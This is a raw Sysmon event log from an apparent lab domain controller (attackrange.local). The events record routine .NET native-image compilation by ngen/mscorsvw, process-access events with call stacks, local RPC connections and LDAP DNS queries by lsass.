21:01:15.342{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11B-60D3-7D02-00000000CF01}2536C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018883Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:15.326{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A11B-60D3-7D02-00000000CF01}2536C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018882Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.326{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11B-60D3-7D02-00000000CF01}2536C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018881Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:15.185{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11B-60D3-7C02-00000000CF01}7032C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018880Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.170{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A11B-60D3-7C02-00000000CF01}7032C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018879Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:15.170{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11B-60D3-7C02-00000000CF01}7032C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018878Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.123{4DB9351A-A11A-60D3-7B02-00000000CF01}6892NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\8X6BRPO3U6\System.Messaging.ni.dll.auxMD5=60C1E905E22120D976121EF5738ED442,SHA256=54D4DA40B3148DEBD43E6A22E3B9C5B2A28B231BC43BBB22EE94A9DE683EDACD,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000018877Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.123{4DB9351A-A11A-60D3-7B02-00000000CF01}6892NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\8X6BRPO3U6\System.Messaging.ni.dllMD5=93836605808A835064C0F896A6BEA90B,SHA256=C2CE62779710EF3C2D2D2690D970F219B84DE490C92AEC2376257F8DE59EC5EE,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018876Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:15.092{4DB9351A-A11A-60D3-7B02-00000000CF01}6892C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1aec-0\System.Messaging.dll2021-06-23 21:01:15.092 354300x800000000000000018920Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.833{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61368-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local49666- 354300x800000000000000018919Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.833{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61368-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local49666- 354300x800000000000000018918Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.832{4DB9351A-9DDD-60D3-0D00-00000000CF01}904C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61367-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local135epmap 354300x800000000000000018917Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:15.832{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61367-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local135epmap 23542300x800000000000000018916Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:16.764{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2751FA361AC61CB8EB32D995AB168E0,SHA256=E9B9A3CFA74065A5B89220FE4D757C9412608011997587A5365A25EEF2726654,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018915Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:16.623{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11C-60D3-8302-00000000CF01}6252C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018914Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:16.607{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A11C-60D3-8302-00000000CF01}6252C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018913Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:16.607{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11C-60D3-8302-00000000CF01}6252C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018912Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:16.217{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AC55F17659CC1B143E3536111B4FF39D,SHA256=E410B5CF5F0ADD0FDC1D25D6F00F681FF0A03C8F0E01F0FA9458068CF340F8E6,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x800000000000000018911Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:16.170{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11C-60D3-8202-00000000CF01}7000C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018910Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:16.154{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A11C-60D3-8202-00000000CF01}7000C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018909Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:16.154{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11C-60D3-8202-00000000CF01}7000C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018908Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:16.107{4DB9351A-A11B-60D3-8102-00000000CF01}7020NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MUVBO6CEG4\System.Numerics.ni.dll.auxMD5=90107E341C19D3117700EA484B28F25B,SHA256=B2539461BFCF88012F3ABFA57261F693D6B4EE7C20D5D41C3E7A8447FFB50D83,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000018907Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:16.107{4DB9351A-A11B-60D3-8102-00000000CF01}7020NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MUVBO6CEG4\System.Numerics.ni.dllMD5=AB61CB545A9DC24A8ED57E1F509C2486,SHA256=9749BAAA95919E74765F39646D85EA7C1C151F77E0BCF564C0C8D603C45E4B3D,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018906Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:16.092{4DB9351A-A11B-60D3-8102-00000000CF01}7020C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1b6c-0\System.Numerics.dll2021-06-23 21:01:16.092 10341000x800000000000000018954Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:17.982{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A11D-60D3-8702-00000000CF01}5544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018953Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:17.982{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11D-60D3-8702-00000000CF01}5544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018952Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:17.935{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11D-60D3-8602-00000000CF01}5452C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000018951Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:17.920{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A11D-60D3-8602-00000000CF01}5452C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018950Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:17.920{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11D-60D3-8602-00000000CF01}5452C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018949Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:17.857{4DB9351A-A11D-60D3-8502-00000000CF01}5648NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\JKO6Q1HCHQ\System.Reflection.Context.ni.dll.auxMD5=5C47900FF167EB523C27C73B02811BBD,SHA256=C24E3DCA6E4F7BA73CEE71B59EDF9B6AAC5B3102BA2BB32136D4E263A3FA72E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018948Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:17.857{4DB9351A-A11D-60D3-8502-00000000CF01}5648NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\JKO6Q1HCHQ\System.Reflection.Context.ni.dllMD5=E4DA61B682A05A204B50B410C15A57AB,SHA256=0302FC9D8E6E766D55212EF2009D46616ADB91748DCF42C299807389B89F9227,IMPHASH=00000000000000000000000000000000truetrue 22542200x800000000000000018947Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.856{4DB9351A-9DDB-60D3-0B00-00000000CF01}628_ldap._tcp.Default-First-Site-Name._sites.ForestDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x800000000000000018946Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.855{4DB9351A-9DDB-60D3-0B00-00000000CF01}628_ldap._tcp.ForestDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x800000000000000018945Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.853{4DB9351A-9DDB-60D3-0B00-00000000CF01}628ForestDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x800000000000000018944Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:15.851{4DB9351A-9DDB-60D3-0B00-00000000CF01}628_ldap._tcp.Default-First-Site-Name._sites.DomainDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x800000000000000018943Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.850{4DB9351A-9DDB-60D3-0B00-00000000CF01}628_ldap._tcp.DomainDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 354300x800000000000000018942Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.849{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-663.attackrange.local53domainfalse10.0.1.14win-dc-663.attackrange.local57688- 354300x800000000000000018941Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.847{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-663.attackrange.local53domainfalse10.0.1.14win-dc-663.attackrange.local50944- 354300x800000000000000018940Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.847{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local55455- 354300x800000000000000018939Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.845{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local58662- 22542200x800000000000000018938Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 